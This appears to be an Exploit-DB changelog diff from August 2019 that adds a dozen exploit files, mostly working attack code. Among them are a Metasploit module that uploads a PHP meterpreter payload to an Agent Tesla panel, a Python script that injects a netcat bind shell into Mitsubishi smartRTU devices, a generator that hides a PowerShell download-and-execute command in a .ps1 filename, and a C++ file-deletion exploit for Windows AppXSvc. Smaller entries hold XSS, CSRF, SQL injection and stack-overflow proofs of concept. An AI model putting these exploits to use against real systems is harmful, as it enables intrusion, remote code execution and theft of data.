DB: 2019-08-15

12 changes to exploits/shellcodes

Windows PowerShell - Unsanitized Filename Command Execution
ABC2MTEX 1.6.1 - Command Line Stack Overflow

Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion

Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download
Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell
SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection
D-Link DIR-600M - Authentication Bypass (Metasploit)
WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery
TortoiseSVN 1.12.1 - Remote Code Execution
ManageEngine opManager 12.3.150 - Authenticated Code Execution

exploits/hardware/webapps/47250.rb

@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Scanner
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'CVE-2019-13101 D-Link DIR-600M Incorrect Access Control',
+      'Description'     => %q{
+          This module attempts to find D-Link router DIR-600M which is
+vulnerable to Incorrect Access Control. The vulnerability exists in
+        wan.htm, which is accessible without authentication. This
+vulnerabilty can lead an attacker to manipulate WAN settings.
+        This module has been tested successfully on Firmware Version
+3.01,3.02,3.03,3.04,3.05,3.06.
+      },
+      'Author'          => [ 'Devendra Singh Solanki <devendra0x0[at]gmail.com>' ],
+      'License'         => MSF_LICENSE,
+      'References'      =>
+        [
+          'CVE', '2019-13101'
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Aug 08 2019'))
+
+    register_options(
+      [
+        Opt::RPORT(80)
+      ])
+  end
+
+  def run_host(ip)
+    res = send_request_cgi({'uri' => '/login.htm'})
+    if res.nil? or res.code == 404
+      print_error("#{rhost}:#{rport} - Host is down.")
+      return
+    end
+
+    if res and res.code == 200 and res.body =~ /D-Link/
+      print_good("#{rhost}:#{rport} - It is a D-Link router")
+    else
+      print_error("#{rhost}:#{rport} - Not a D-Link router")
+      return
+    end
+
+    res = send_request_cgi({'uri' => '/wan.htm'})
+
+    if res and res.code == 200 and res.body =~ /PPPoE/
+      print_good("#{rhost}:#{rport} - Router is vulnerable for
+Incorrect Access Control. CVE-2019-13101")
+    else
+      print_error("#{rhost}:#{rport} - Router is with different firmware.")
+      return
+    end
+
+  end
+end

exploits/linux/dos/47254.txt

@@ -0,0 +1,64 @@
+Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow
+Date: 2019-08-13
+Exploit Author: Carter Yagemann <yagemann@gatech.edu>
+Vendor Homepage: https://abcnotation.com/abc2mtex/
+Software Link: https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
+Version: 1.6.1
+Tested on: Debian Buster
+
+An unsafe strcpy at abc.c:241 allows an attacker to overwrite the return
+address from the openIn function by providing a long input filename. This
+carries similar risk to CVE-2004-1257.
+
+Setup:
+
+$ wget https://github.com/mudongliang/source-packages/raw/master/CVE-2004-1257/abc2mtex1.6.1.tar.gz
+$ tar -xzf abc2mtex1.6.1.tar.gz
+$ make
+
+$ gcc --version
+gcc (Debian 8.3.0-6) 8.3.0
+Copyright (C) 2018 Free Software Foundation, Inc.
+This is free software; see the source for copying conditions.  There is NO
+warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+
+PoC:
+
+$ ./abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
+
+GDB:
+
+We're going to place a breakpoint before and after abc.c:241 to show the overflow.
+
+$ gdb -q ./abc2mtex
+Reading symbols from ./abc2mtex...done.
+(gdb) break abc.c:241
+Breakpoint 1 at 0x4139: file abc.c, line 241.
+(gdb) break abc.c:242
+Breakpoint 2 at 0x414c: file abc.c, line 242.
+(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
+Starting program: /tmp/tmp.4jy8nhwOI3/abc2mtex AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA
+
+Breakpoint 1, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
+241                     (void) strcpy(savename,filename);
+(gdb) bt
+#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:241
+#1  0x0000555555556f00 in main (argc=2, argv=0x7fffffffe4f8) at fields.c:273
+(gdb) c
+Continuing.
+
+Breakpoint 2, openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
+242                     (void) strcat(filename,".abc");
+(gdb) bt
+#0  openIn (filename=0x7fffffffe240 'A' <repeats 120 times>, "FEDCBA") at abc.c:242
+#1  0x0000414243444546 in ?? ()
+#2  0x00007fffffffe4f8 in ?? ()
+#3  0x0000000200000000 in ?? ()
+#4  0x0000000000000000 in ?? ()
+(gdb) c
+Continuing.
+file "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFEDCBA" does not exist
+
+Program received signal SIGSEGV, Segmentation fault.
+0x0000414243444546 in ?? ()
+(gdb) quit

exploits/php/remote/47256.rb

@@ -0,0 +1,106 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Tesla Agent Remote Code Execution",
+      'Description'    => %q{
+        This module exploits the command injection vulnerability of tesla agent botnet panel.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://prodaft.com']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['php'],
+      'Arch'           => [ ARCH_PHP ],
+      'Targets'        =>
+      [
+        ['PHP payload',
+          {
+            'Platform' => 'PHP',
+            'Arch' => ARCH_PHP,
+            'DefaultOptions' => {'PAYLOAD'  => 'php/meterpreter/bind_tcp'}
+          }
+        ]
+      ],
+      'Privileged'     => false,
+      'DisclosureDate' => "July 10 2018",
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']),
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'),
+    )
+    #print_status(res.body)
+    if res && res.body.include?('SQLSTATE')
+      Exploit::CheckCode::Appears
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    check
+
+    name = '.'+Rex::Text.rand_text_alpha(4)+'.php'
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'),
+      'encode_params' => true,
+      'vars_get'  => {
+        'table'  => 'passwords',
+        'primary'  => 'password_id',
+        'clmns'  => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}',
+        'where'  => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"")
+      }
+    )
+
+    if res && res.code == 200 && res.body.include?('recordsTotal')
+      print_good("Payload uploaded as #{name}")  
+    else
+      print_error('Payload upload failed :(')
+      Msf::Exploit::Failed
+    end
+
+    
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5
+    )
+    
+    if res && res.code == 200
+      print_good("Payload successfully triggered !")  
+    else
+      print_error('Payload trigger failed :(')
+      Msf::Exploit::Failed
+    end
+    
+  end
+end

exploits/php/webapps/47234.py

@@ -0,0 +1,38 @@
+#!/usr/bin/python
+
+# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated Configuration Download
+# Date: 29 June 2019 
+# Exploit Author: (@xerubus | mogozobo.com)
+# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
+# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
+# Firmware Version: Misubishi Electric 2.02 & INEA 3.0
+# CVE-ID: CVE-2019-14927
+# Full write-up: https://www.mogozobo.com/?p=3593
+
+import sys, os, requests, socket
+
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= Conf_Me-smartRTU  by @xerubus =-    
+|   D _]/\ \  -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+host = raw_input("Enter RTU IP address: ")
+	
+php_page = '/saveSettings.php'
+url = "http://{}{}".format(host, php_page)
+
+print "[+] Attempting to download smartRTU configuration file"
+
+r = requests.get(url)
+if r.status_code == 200:
+   print "[+] Successfully obtained smartRTU configuration file.. saving to smartRTU_conf.xml\n"
+   with open('smartRTU_conf.xml', 'w') as f:
+      f.write(r.content)

exploits/php/webapps/47235.py

@@ -0,0 +1,69 @@
+#!/usr/bin/python
+
+# Exploit Title: Mitsubishi Electric smartRTU & INEA ME-RTU Unauthenticated OS Command Injection
+# Date: 29 June 2019 
+# Exploit Author: (@xerubus | mogozobo.com)
+# Vendor Homepage: https://eu3a.mitsubishielectric.com/fa/en/products/cnt/plcccl/items/smartRTU/local
+# Vendor Homepage: http://www.inea.si/en/telemetrija-in-m2m-produkti/mertu-en/
+# Firmware Version: Misubishi Electric 2.02 & INEA 3.0 
+# CVE-ID: CVE-2019-14931
+# Full write-up: https://www.mogozobo.com/?p=3593
+
+import sys, os, requests, socket
+
+os.system('clear')
+
+print("""\
+        _  _
+  ___ (~ )( ~)
+ /   \_\ \/ /   
+|   D_ ]\ \/  -= Bind_Me-smartRTU  by @xerubus =-    
+|   D _]/\ \  -= We all have something to hide =-
+ \___/ / /\ \\
+      (_ )( _)
+      @Xerubus    
+                    """)
+
+host = raw_input("Enter RTU IP address: ")
+port = raw_input("Enter bind shell port number: ")
+	
+php_page = '/action.php'
+url = "http://{}{}".format(host, php_page)
+payload = {'host' : ';sudo /usr/sbin/service ../../bin/nc -nvlp '+port+' -e /bin/sh&PingCheck=Test'}
+
+print "\n[+] Building payload"
+print "[+] Sending payload"
+print "[+] Attempting connection to smartRTU"
+
+try:
+   r = requests.post(url, data=payload, timeout=1)
+except:
+   pass
+
+port = (int(port))
+
+try:
+   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+   s.connect((host, port))
+	
+   try :  
+      print "[+] Connected to the smartRTU!\n"
+      while 1:  
+         cmd = raw_input("(smartRTU-shell) # ");  
+         s.send(cmd + "\n");  
+         result = s.recv(1024).strip();  
+         if not len(result) :  
+            print "\n[!] Play nice now skiddies....\n\n"
+            s.close();  
+            break;  
+         print(result);  
+
+   except KeyboardInterrupt:
+      print "\n[+] ^C Received, closing connection"
+      s.close();
+   except EOFError:
+      print "\n[+] ^D Received, closing connection"
+      s.close();
+
+except socket.error:
+   print "[!] Failed to connect to bind shell."

exploits/php/webapps/47247.txt

@@ -0,0 +1,30 @@
+# Exploit Title: 0Day UnauthenticatedXSS SugarCRM Enterprise
+# Google Dork: N/A
+# Date: 11.08.2019
+# Exploit Author: Ilca Lucian Florin
+# Vendor Homepage: https://www.sugarcrm.com
+# Version: 9.0.0
+# Tested on: Windows 7 / Internet Explorer 11 / Google Chrome 76
+# CVE : 2019-14974
+
+The application fails to sanitize user input on https://sugarcrm-qms.XXX.com/mobile/error-not-supported-platform.html and reflect the input directly in the HTTP response, allowing the hacker to exploit the vulnerable parameter and have malicious content executed in the victim's browser.
+
+Steps to reproduce:
+
+1.Attacker will craft a malicious payload and create a legitimate link with the payload included;
+2. Attacker will send the link to the victim;
+3. Upon clicking on the link, the malicious payload will be reflected in the response and executed in the victim’s browser.
+
+The behavior can be observed by visiting the following URL:
+
+https://server/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(document.cookie);//itms://
+
+Clicking on FULL VERSION OF WEBSITE will trigger the XSS.
+
+Impact statement:
+
+Although requiring user interaction, reflected XSS impact might range from web defacement to stealing user info and full account takeover, depending on the circumstances.
+
+Recommendation:
+
+Always ensure to validate parameters input and encode the output.

exploits/php/webapps/47249.txt

@@ -0,0 +1,23 @@
+#Exploit Title: Joomla! component com_jsjobs - 'customfields.php' SQL Injection
+#Dork: inurl:"index.php?option=com_jsjobs"
+#Date: 13.08.19
+#Exploit Author: qw3rTyTy
+#Vendor Homepage: https://www.joomsky.com/
+#Software Link: https://www.joomsky.com/5/download/1
+#Version: 1.2.5
+#Tested on: Debian/nginx/joomla 3.9.0
+#####################################
+#Vulnerability details:
+#####################################
+Vulnerable code is in line 171 in file site/models/customfields.php
+
+   169	    function dataForDepandantField( $val , $childfield){ 
+   170	        $db = $this->getDBO();
+   171	        $query = "SELECT userfieldparams,fieldtitle FROM `#__js_job_fieldsordering` WHERE field = '".$childfield."'";	//!!!
+   172	        $db->setQuery($query);
+   173	        $data = $db->loadObject();
+
+#####################################
+#PoC:
+#####################################
+$> sqlmap.py -u "http://localhost/index.php?option=com_jsjobs&task=customfields.datafordepandantfield&fvalue=0&child=0" --random-agent --dbms=mysql --method GET -p child --technique E

exploits/php/webapps/47251.txt

@@ -0,0 +1,51 @@
+# Exploit Title: CSRF vulnerabilities in WordPress Download Manager Plugin 2.5
+# Google Dork: inurl:"/wp-content/plugins/download-manager
+# Date: 24 may, 2019
+# Exploit Author: Princy Edward
+# Exploit Author Blog : https://prinyedward.blogspot.com/
+# Vendor Homepage: https://www.wpdownloadmanager.com/
+# Software Link: https://wordpress.org/plugins/download-manager/
+# Tested on: Apache/2.2.24 (CentOS)
+POC 
+
+#1 
+
+There is no CSRF nonce check performed in "POST
+/wp-admin/admin-ajax.php?action=wpdm_save_email_setting" request. 
+
+#Code
+
+<form method="POST"
+action="http://localhost/wp-admin/admin-ajax.php?action=wpdm_save_email_setting">
+<input type="hidden" name="__wpdm_email_template" value="default.html">
+<input type="hidden" name="__wpdm_email_setting[logo]"
+value="https://hacker.jpg">
+<input type="hidden" name="__wpdm_email_setting[banner]"
+value="https://hacker.jpg">
+<input type="hidden" name="__wpdm_email_setting[footer_text]"
+value="https://malicious-url.com"><input type="hidden" name="__wpdm_email_setting[facebook]"
+value="https://malicious-url.com">
+<input type="hidden" name="__wpdm_email_setting[twitter]" value="https://malicious-url.com">
+<input type="hidden" name="__wpdm_email_setting[youtube]"
+value="https://malicious-url.com">
+<input type="submit">
+</form>
+
+#2
+
+There is no CSRF nonce check performed in "POST
+/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&task=EditEmailTemplat
+e&id=default" request.
+
+#Code
+
+<form method="POST"
+action="http://localhost/wp-admin/edit.php?post_type=wpdmpro&page=templates&_type=email&
+task=EditEmailTemplate&id=default">
+<input type="hidden" name="id" value="default">
+<input type="hidden" name="email_template[subject]" value="forget password">
+<input type="hidden" name="email_template[message]" value="aaa">
+<input type="hidden" name="email_template[from_name]" value="hacker">
+<input type="hidden" name="email_template[from_email]" value="hacker@hacker.com">
+<input type="submit">
+</form>

exploits/windows/dos/47248.py

@@ -0,0 +1,144 @@
+'''
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt
+[+] ISR: Apparition Security          
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+Windows PowerShell
+
+Windows PowerShell is a Windows command-line shell designed especially for system administrators.
+PowerShell includes an interactive prompt and a scripting environment that can be used independently or in combination.
+
+
+[Vulnerability Type]
+Unsanitized Filename Command Execution
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+PowerShell can potentially execute arbitrary code when running specially named scripts due to trusting unsanitized filenames.
+This occurs when ".ps1" files contain semicolons ";" or spaces as part of the filename, causing the execution of a different trojan file;
+or the running of unexpected commands straight from the filename itself without the need for a second file.
+
+For trojan files it doesn't need to be another PowerShell script and can be one of the following ".com, .exe, .bat, .cpl, .js, .vbs and .wsf.
+Therefore, the vulnerably named file ".\Hello;World.ps1" will instead execute "hello.exe", if that script is invoked using the standard
+Windows shell "cmd.exe" and "hello.exe" resides in the same directory as the vulnerably named script.
+
+However, when such scripts are run from PowerShells shell and not "cmd.exe" the "&" (call operator) will block our exploit from working.
+
+Still, if the has user enabled ".ps1" scripts to open with PowerShell as its default program, all it takes is double click the file to trigger 
+the exploit and the "& call operator" will no longer save you. Also, if the user has not enabled PowerShell to open .ps1 scripts
+as default; then running the script from cmd.exe like: c:\>powershell "\Hello;World.ps1" will also work without dropping into the PowerShell shell.
+
+My PoC will download a remote executable save it to the victims machine and then execute it, and the PS files contents are irrelevant.
+Also, note I use "%CD" to target the current working directory where the vicitm has initially opened it, after it calls "iwr" (invoke-webrequest)
+abbreviated for space then it sleeps for 2 seconds and finally executes.
+
+C:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
+
+This can undermine the integrity of PowerShell as it potentially allows unexpected code execution; even when the scripts contents are visually reviewed.
+We may also be able to bypass some endpoint protection or IDS systems that may look at the contents or header of a file but not its filename where are
+commands can be stored.
+
+For this to work the user must have enabled PowerShell as its default program when opening ".ps1" files.
+
+First, we create a Base64 encoded filename for obfuscation; that will download and execute a remote executable named in this case "n.exe".
+c:\>powershell [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'powershell iwr 192.168.1.10/n -O %CD%\n.exe ;sleep -s 2;start n.exe'"))
+
+Give the PS script a normal begining name, then separate commands using ";" semicolon e.g.
+
+Test;powershell -e <BASE64 ENCODED COMMANDS>;2.ps1
+
+Create the executable without a file extension to save space for the filename then save it back using the -O parameter.
+The "-e" is abbreviated for EncodedCommand to again save filename space.
+
+Host the executable on web-server or just use python -m SimpleHTTPServer 80 or whatever.
+Double click to open in PowerShell watch the file get downloaded saved and executed!
+
+My example is used as a "filename embedded downloader", but obviously we can just call other secondary trojan files of various types in the same directory.
+
+Note: User interaction is required, and obviously running any random PS script is dangerous... but hey we looked at the file content and it simply printed a string!
+
+
+[Exploit / PoC]
+'''
+
+from base64 import b64encode
+import argparse,sys
+#Windows PowerShell - Unsantized Filename Command Execution Vulnerability PoC
+#Create ".ps1" files with Embedded commands to download, save and execute malware within a PowerShell Script Filename.
+#Expects hostname/ip-addr of web-server housing the exploit.
+#By hyp3rlinx
+#Apparition Security
+#====================
+
+
+def parse_args():
+    parser.add_argument("-i", "--ipaddress", help="Remote server to download and exec malware from.")
+    parser.add_argument("-m", "--local_malware_name", help="Name for the Malware after downloading.")
+    parser.add_argument("-r", "--remote_malware_name", help="Malwares name on remote server.")
+    return parser.parse_args()
+
+def main(args):
+    PSEmbedFilenameMalwr=""
+    if args.ipaddress:
+        PSEmbedFilenameMalwr = "powershell iwr "+args.ipaddress+"/"+args.remote_malware_name+" -O %CD%\\"+args.local_malware_name+" ;sleep -s 2;start "+args.local_malware_name
+    return b64encode(PSEmbedFilenameMalwr.encode('UTF-16LE'))
+
+def create_file(payload):
+    f=open("Test;PowerShell -e "+payload+";2.ps1", "w")
+    f.write("Write-Output 'Have a nice day!'")
+    f.close()
+
+if __name__=="__main__":
+    
+    parser = argparse.ArgumentParser()
+    PSCmds = main(parse_args())
+
+    if len(sys.argv)==1:
+        parser.print_help(sys.stderr)
+        sys.exit(1)
+        
+    create_file(PSCmds)
+    print "PowerShell - Unsantized Filename Command Execution File created!"
+    print "By hyp3rlinx"
+
+'''
+[POC Video URL]
+https://www.youtube.com/watch?v=AH33RW9g8J4
+
+
+[Network Access]
+Remote
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: July 20, 2019
+MSRC "does not meet the bar for security servicing" : July 23, 2019
+August 1, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+'''
+
+hyp3rlinx

exploits/windows/local/47253.cpp

@@ -0,0 +1,244 @@
+/*
+# Author : Abdelhamid Naceri
+# Discovered On : 13/08/2019
+# Description : An Elevation Of Privileges Exist when the microsoft AppXSvc
+Deployment Service Cannot Properly Handle The Folder Junction lead to an arbitrary file deletion
+from a low integrity user .
+# Still Unpatched On 13/08/2019
+Here Is A Demo Video https://youtu.be/jqYwMcNvTtM
+*/
+#include"windows.h"
+#include"iostream"
+#include"conio.h"
+#include"stdio.h"
+#include"tlhelp32.h"
+#include"cstdio"
+#include"wchar.h"
+#include"process.h"
+#include"wchar.h"
+#include"string"
+#include"tchar.h"
+
+#pragma warning(disable : 4996)
+#pragma comment(lib, "advapi32.lib")
+#ifndef UNICODE  
+typedef std::string String;
+#else
+typedef std::wstring String;
+#endif
+
+using namespace std;
+
+bool FileExists(const wchar_t* file) {
+	if (INVALID_FILE_ATTRIBUTES == GetFileAttributes(file) && GetLastError() == ERROR_FILE_NOT_FOUND)
+	{
+		return false;
+	}
+	else {
+		return true;
+	}
+}
+
+void remove_dir(const wchar_t* folder)
+{
+	std::wstring search_path = std::wstring(folder) + _T("/*.*");
+	std::wstring s_p = std::wstring(folder) + _T("/");
+	WIN32_FIND_DATA fd;
+	HANDLE hFind = ::FindFirstFile(search_path.c_str(), &fd);
+	if (hFind != INVALID_HANDLE_VALUE) {
+		do {
+			if (fd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
+				if (wcscmp(fd.cFileName, _T(".")) != 0 && wcscmp(fd.cFileName, _T("..")) != 0)
+				{
+					remove_dir((wchar_t*)(s_p + fd.cFileName).c_str());
+				}
+			}
+			else {
+				DeleteFile((s_p + fd.cFileName).c_str());
+			}
+		} while (::FindNextFile(hFind, &fd));
+		::FindClose(hFind);
+		_wrmdir(folder);
+	}
+}
+
+void killProcessByName(const wchar_t* filename)
+{
+	HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPALL, NULL);
+	PROCESSENTRY32 pEntry;
+	pEntry.dwSize = sizeof(pEntry);
+	BOOL hRes = Process32First(hSnapShot, &pEntry);
+	while (hRes)
+	{
+		if (wcscmp(pEntry.szExeFile, filename) == 0)
+		{
+			HANDLE hProcess = OpenProcess(PROCESS_TERMINATE, 0,
+				(DWORD)pEntry.th32ProcessID);
+			if (hProcess != NULL)
+			{
+				TerminateProcess(hProcess, 9);
+				CloseHandle(hProcess);
+			}
+		}
+		hRes = Process32Next(hSnapShot, &pEntry);
+	}
+	CloseHandle(hSnapShot);
+}
+
+bool IsProcessRunning(const wchar_t* processName)
+{
+	bool exists = false;
+	PROCESSENTRY32 entry;
+	entry.dwSize = sizeof(PROCESSENTRY32);
+
+	HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);
+
+	if (Process32First(snapshot, &entry))
+		while (Process32Next(snapshot, &entry))
+			if (!_wcsicmp(entry.szExeFile, processName))
+				exists = true;
+
+	CloseHandle(snapshot);
+	return exists;
+}
+
+bool dirExists(const std::string& dirName_in)
+{
+	DWORD ftyp = GetFileAttributesA(dirName_in.c_str());
+	if (ftyp == INVALID_FILE_ATTRIBUTES)
+		return false;
+
+	if (ftyp & FILE_ATTRIBUTE_DIRECTORY)
+		return true;
+
+	return false;
+}
+
+void KillEdge()
+{
+	killProcessByName(L"MicrosoftEdge.exe");
+}
+
+void StartEdge() 
+{
+	try
+	{
+		system("start microsoft-edge:");
+	}
+	catch (...){}
+}
+
+void exploit(const char* path) {
+	//Inintializing the variable before begining
+	int attempt = 0;
+	string command;
+	wchar_t* userprofile = _wgetenv(L"USERPROFILE");
+	const wchar_t* relpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe");
+	//I created roaming path variable because sometime when i try to wipe ms-edge folder he deny the access so as a solution
+	//I deleted him first
+	const wchar_t* roamingpath = (L"\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\RoamingState");
+	wstring froamingpath(userprofile);
+	froamingpath += wstring(roamingpath);
+	wstring fullpath(userprofile);
+	fullpath += std::wstring(relpath);
+	wchar_t* szBuffsrc = (wchar_t*)fullpath.c_str();
+	wstring fpath(szBuffsrc);
+	string strfpath(fpath.begin(), fpath.end());
+	//Check If MS-Edge Need To Write DACL Or Not
+
+	if (dirExists(strfpath) != true) { 
+		printf("[!] Wait MS-Edge Need To Write The DACL");
+		StartEdge();
+		for (;;) {
+			Sleep(1000);
+			if (IsProcessRunning(L"MicrosoftEdge.exe") == true) { break; }
+		}
+		StartEdge();
+		Sleep(7000);
+		KillEdge();
+		printf("\r                                      ");
+	
+	}
+
+	//End Of Check
+	printf("\r# Author : Abdelhamid Naceri\n");
+	printf("# Tested On Windows 10 32&64bit\n");
+	printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
+	printf("[+] Checking If Path Exist ...");
+	Sleep(2000);
+	if (dirExists(path) != true) { 
+		printf("Your Path Is Invalid"); 
+		ExitProcess(EXIT_FAILURE); }
+	else { 
+		printf("Exist !\n");
+		KillEdge();
+		printf("[+] Starting MS-Edge ...\n");
+		StartEdge();
+		Sleep(4000);
+		printf("[+] Killing MS-Edge ...\n");
+		KillEdge();
+		Sleep(3000);
+		printf("[+] Wipping MS-Edge Directory ...\n");
+		killProcessByName(L"dllhost.exe");//I Kill This Process Because Somethime He Lock The Files
+		remove_dir(roamingpath);
+		remove_dir(szBuffsrc);
+		Sleep(2000);
+		remove_dir(szBuffsrc);
+		printf("[+] Checking If Directory Exist Anymore ...");
+		if (dirExists(strfpath) == true) {
+			
+			if (dirExists(strfpath) == true) {
+				printf("Something Went Wrong");
+				printf("\n[!] You Should Delete The Files YourSelf Press Anything To Continue");
+				command = "explorer ";
+				command.append(strfpath);
+				system(command.c_str());
+				_getch();
+				goto Continue;
+			}
+		}
+		else {
+Continue:
+			printf(" Done\n");
+			Sleep(3000);
+			printf("[+] Attempting to Create Junction To Target ...\n");
+			command = "mklink /J ";
+			command.append("\"");
+			command.append(strfpath);
+			command.append("\"");
+			command.append(" ");
+			command.append("\"");
+			command.append(path);
+			command.append("\"");
+			system(command.c_str());
+			printf("Done\n");
+			Sleep(3000);
+			printf("[+] Firing Up MS-Edge Again ...\n");
+			StartEdge();
+			do { Sleep(1000);  } while (IsProcessRunning(L"MicrosoftEdge.exe"));
+			Sleep(3000);
+			StartEdge();
+			command = "explorer ";
+			command.append(path);
+			printf("[!] If The Exploit Done , MS AppXSvc Will Wipe The Target Path\n");
+			system(command.c_str());
+			printf("[!] We Will Open Explorer In The Target Check Your Files If The File Deleted Press Anything To Clear The Exploit Files...\n");
+			_getch();
+			printf("Cleaning ...");
+			_wremove(szBuffsrc);
+			_wrmdir(szBuffsrc);
+			ExitProcess(EXIT_SUCCESS);
+		}
+	}
+}
+
+int main(int argc, char* argv[]) {
+	if (argc == 2) {exploit(argv[1]);}
+	else { 
+		printf("# Author : Abdelhamid Naceri\n");
+		printf("# Tested On Windows 10 1903 32&64bit\n");
+		printf("# Description : A Vulnerabilitie Exist On Microsoft AppXSvc Deployement Service (\"wsappx\") Could Allow An Attacker To Arbitratry Delete Any File Exist On A Windows Machine\n");
+		printf("[!] Usage : poc.exe TargetPath");
+	}
+	return EXIT_SUCCESS;
+}

exploits/windows/webapps/47252.txt

@@ -0,0 +1,194 @@
+Document Title:
+===============
+TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2188
+
+Product:
+https://osdn.net/projects/tortoisesvn/storage/1.12.1/Application/TortoiseSVN-1.12.1.28628-x64-svn-1.12.2.msi/
+
+Ticket: https://groups.google.com/forum/#!forum/tortoisesvn
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14422
+
+CVE-ID:
+=======
+CVE-2019-14422
+
+
+Release Date:
+=============
+2019-08-13
+
+
